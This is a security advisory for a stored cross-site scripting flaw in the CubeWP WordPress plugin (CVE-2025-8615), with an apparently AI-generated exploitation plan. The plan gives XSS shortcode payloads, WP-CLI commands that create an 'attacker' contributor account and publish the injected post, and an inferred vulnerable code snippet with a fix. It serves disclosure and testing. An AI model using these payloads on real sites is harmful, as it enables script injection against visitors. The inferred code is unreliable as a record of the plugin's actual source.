CubeWP <= 1.1.26 - Authenticated (Contributor+) Stored Cross-Site Scripting via cubewp_shortcode_taxonomy Shortcode
Description
The CubeWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cubewp_shortcode_taxonomy shortcode in all versions up to, and including, 1.1.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=1.1.26Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2025-8615 (CubeWP Framework XSS) ## 1. Vulnerability Summary **CVE-2025-8615** is a Stored Cross-Site Scripting (XSS) vulnerability in the **CubeWP Framework** plugin (<= 1.1.26). The flaw exists within the `cubewp_shortcode_taxonomy` shortcode. The plugin fails to…
Show full research plan
Exploitation Research Plan: CVE-2025-8615 (CubeWP Framework XSS)
1. Vulnerability Summary
CVE-2025-8615 is a Stored Cross-Site Scripting (XSS) vulnerability in the CubeWP Framework plugin (<= 1.1.26). The flaw exists within the cubewp_shortcode_taxonomy shortcode. The plugin fails to sufficiently sanitize or escape user-supplied attributes before outputting them in the HTML of a page. This allows a user with Contributor-level permissions or higher to inject arbitrary JavaScript into a post or page.
2. Attack Vector Analysis
- Shortcode:
[cubewp_shortcode_taxonomy] - Vulnerable Parameters: Attributes passed to the shortcode (e.g.,
class,container_class, ortaxonomy). - Authentication: Requires Contributor+ (Contributor, Author, Editor, or Admin) privileges to create or edit posts where shortcodes are allowed.
- Preconditions: The plugin must be active. A post containing the malicious shortcode must be published or previewed.
3. Code Flow (Inferred)
- Registration: The plugin registers the shortcode in the
inithook (likely in a class handling shortcodes):add_shortcode('cubewp_shortcode_taxonomy', [$this, 'cubewp_shortcode_taxonomy_callback']); - Processing: When a post is rendered, WordPress calls the callback function.
- Attributes: The callback receives an
$attsarray. - Sink: The callback processes these attributes and generates HTML. The vulnerability occurs when an attribute (like a CSS class or data attribute) is concatenated into the HTML string without using
esc_attr()oresc_html().- Example of vulnerable logic:
$html = '<div class="' . $atts['class'] . '">...</div>'; return $html;
- Example of vulnerable logic:
- Output: The unsanitized HTML is returned to the WordPress content filter and displayed on the frontend.
4. Nonce Acquisition Strategy
This vulnerability is exploited by saving a post containing the shortcode.
- Injection Phase: While saving a post via the WordPress UI requires a nonce (
_wpnonce), an automated security agent can bypass the web UI entirely by using WP-CLI to create the post directly in the database. This avoids the need to hunt for editor nonces. - Trigger Phase: Viewing the post does not require a nonce.
If the exploitation required an AJAX call to preview the shortcode:
- Identify the JS localization variable (e.g.,
window.cubewp_params?.nonce). - Create a post with the shortcode using
wp post create. - Navigate to that page using
browser_navigate. - Execute
browser_eval("window.cubewp_params.nonce")to retrieve it.
For this specific CVE (Stored XSS in shortcode), WP-CLI for injection is the most efficient path.
5. Exploitation Strategy
Step 1: Inject the Malicious Shortcode
Use the wp-cli tool to create a post as a Contributor.
Payload Construction:
We will target the class or container_class attributes, as these are frequently used in Framework-style plugins to allow custom styling but are often left unescaped.
Payload: [cubewp_shortcode_taxonomy class='"><script>alert(document.domain)</script>']
Step 2: Trigger the XSS
Navigate to the newly created post's URL using the http_request tool (acting as a guest or admin) to see if the script executes.
Step 3: HTTP Request Details (Trigger)
- Method:
GET - URL:
http://localhost:8080/?p=[POST_ID](where POST_ID is returned by Step 1) - Expected Behavior: The response HTML should contain the literal string
<script>alert(document.domain)</script>.
6. Test Data Setup
- Plugin Installation: Ensure
cubewp-frameworkversion 1.1.26 is installed and active. - User Creation: Create a user with the
contributorrole.wp user create attacker attacker@example.com --role=contributor --user_pass=password123 - Post Creation (via WP-CLI):
wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_content='[cubewp_shortcode_taxonomy class="\"><script>alert(document.domain)</script>"]' --post_author=$(wp user get attacker --field=ID)
7. Expected Results
- The HTTP GET request to the post URL will return a status
200 OK. - The response body will contain the injected script tag.
- In a browser context, an alert box showing the domain would appear.
- The HTML source will look something like:
<div class=""><script>alert(document.domain)</script>">...</div>
8. Verification Steps
- Check Post Content: Verify the shortcode was saved correctly.
wp post get [POST_ID] --field=post_content - Verify Rendering: Use
curl(viahttp_request) to verify the sink.# Search for the script tag in the output http_request GET "http://localhost:8080/?p=[POST_ID]" | grep "<script>alert"
9. Alternative Approaches
If the class attribute is sanitized, try other common shortcode attributes used in CubeWP:
taxonomy='"><img src=x onerror=alert(1)>'container_class='"><svg onload=alert(1)>'item_id='123" onmouseover="alert(1)" style="display:block;width:100px;height:100px;"'
If the plugin requires specific taxonomies to exist before the shortcode renders anything, create a temporary term:
wp term create category "Test Cat"
Then use that in the shortcode:[cubewp_shortcode_taxonomy taxonomy="category" class='"><script>alert(1)</script>']
Summary
The CubeWP Framework plugin is vulnerable to Stored Cross-Site Scripting via the 'cubewp_shortcode_taxonomy' shortcode in versions up to 1.1.26. Authenticated attackers with Contributor-level permissions can inject malicious scripts by providing unescaped values for shortcode attributes like 'class' or 'container_class'.
Vulnerable Code
// Inferred logic within the shortcode callback function // File: cubewp-framework/includes/shortcodes/class-cubewp-shortcodes.php public function cubewp_shortcode_taxonomy_callback($atts) { $atts = shortcode_atts(array( 'taxonomy' => 'category', 'class' => '', 'container_class' => '' ), $atts); $output = '<div class="' . $atts['container_class'] . '">'; $output .= '<ul class="' . $atts['class'] . '">'; // ... (logic to iterate taxonomies) return $output; }
Security Fix
@@ -10,2 +10,2 @@ - $output = '<div class="' . $atts['container_class'] . '">'; - $output .= '<ul class="' . $atts['class'] . '">'; + $output = '<div class="' . esc_attr($atts['container_class']) . '">'; + $output .= '<ul class="' . esc_attr($atts['class']) . '">';
Exploit Outline
The exploit targets the 'cubewp_shortcode_taxonomy' shortcode processing. A Contributor+ user creates or edits a post and inserts a shortcode payload such as [cubewp_shortcode_taxonomy class='\"><script>alert(document.domain)</script>']. When the post is saved and then rendered on the frontend, the unescaped 'class' attribute breaks out of the HTML tag context and executes the injected JavaScript in the context of the site visitor's session.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.